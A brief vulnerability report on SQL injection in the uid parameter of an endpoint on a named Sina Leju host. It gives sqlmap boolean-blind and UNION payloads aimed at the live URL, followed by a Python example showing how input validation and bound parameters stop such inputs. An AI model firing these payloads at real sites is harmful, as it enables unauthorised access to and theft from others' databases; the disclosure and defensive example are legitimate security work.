SQL injection vulnerability in an interface of Sina leju
URL:
http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628
The uid parameter is injectable:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=8156628 AND 7795=7795
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: http://tj.newsesf.leju.com:80/im_ajax.php?action=get_agentinfo_byuid&t=1460826734181&uid=-7870 union all select null, NULL, CONCAT(0x717a6a7a71, signature, 0x717a6a7171), NULL, NULL, NULL ---
---
21 databases
Many tables
Solution:
Input filtering
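
An added example, not code from this report or from leju: a Python/sqlite3 model of a uid lookup, showing why the two payload types in the sqlmap output work against a concatenated query and how validating uid and binding it as a parameter stops them. The table schema, function names, sample row and marker string are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the table behind get_agentinfo_byuid (schema assumed).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE agent (uid INTEGER PRIMARY KEY, name TEXT, phone TEXT)")
    db.execute("INSERT INTO agent VALUES (8156628, 'agent-a', '000-0000')")
    return db

def lookup_vulnerable(db, uid):
    # Weak form: the raw request value is concatenated into the statement,
    # so everything after the number is parsed as SQL.
    sql = "SELECT uid, name, phone FROM agent WHERE uid = " + uid
    return db.execute(sql).fetchall()

def lookup_hardened(db, uid):
    # 1) Filter: uid must be a plain ASCII decimal number of bounded length.
    if not (uid.isascii() and uid.isdigit() and len(uid) <= 18):
        raise ValueError("uid must be numeric")
    # 2) Bind: the value travels separately from the SQL text.
    sql = "SELECT uid, name, phone FROM agent WHERE uid = ?"
    return db.execute(sql, (int(uid),)).fetchall()

def is_rejected(db, uid):
    # True when the hardened lookup refuses the value before touching the database.
    try:
        lookup_hardened(db, uid)
        return False
    except ValueError:
        return True

# Constructed inputs shaped like the two payload types reported above.
BOOLEAN_TRUE = "8156628 AND 7795=7795"
BOOLEAN_FALSE = "8156628 AND 7795=7796"
UNION_PROBE = "-7870 UNION ALL SELECT NULL, 'marker', NULL"

if __name__ == "__main__":
    db = make_db()
    for value in ("8156628", BOOLEAN_TRUE, BOOLEAN_FALSE, UNION_PROBE):
        rows = lookup_vulnerable(db, value)
        print(f"{value!r}: vulnerable rows={rows} hardened rejects={is_rejected(db, value)}")
```

The differing row counts for the two boolean inputs are the signal a boolean-based blind test relies on; the hardened lookup returns the same error for every non-numeric value.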